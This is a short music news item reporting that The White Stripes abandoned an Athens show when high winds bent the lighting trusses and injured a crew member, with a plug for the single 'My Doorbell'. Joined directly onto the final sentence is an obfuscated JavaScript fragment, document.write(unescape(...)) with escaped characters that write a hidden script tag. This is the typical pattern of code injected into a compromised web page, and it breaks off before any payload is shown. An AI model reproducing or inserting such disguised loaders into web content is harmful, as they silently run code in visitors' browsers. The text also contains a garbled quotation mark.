The White Stripes were forced to abandon a gig in Greece after strong winds resulted in injury to a crew member.
The duo were playing the Olympic Beach Volleyball Stadium in Athens on their last night of their tour of the country when heavy winds caused the trusses holding the lights to bend, risking collapse of the lighting and the stage itself.
After two attempts to secure the trusses and stage, as well as the resulting injury to a crew member, the band were forced to call a halt to their performance.
A Spokesperson for the band who was at the gig: “It was incredibly windy, and definitely would have been dangerous if the show had continued. The band did the right thing.â€
The White Stripes release new single 'My Doorbell' on August 8. It's the second track to be lifted from their current album 'Get Behind Me Satan', following the Top Ten success of 'Blue Orchid' earlier this year.
Additional tracks across the formats include live versions of 'Screwdriver' and 'Same Boy You've Always Known', recorded at the Teatro Amazones in Manaus, Brazil.
UK shows are expected before the end of 2005.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
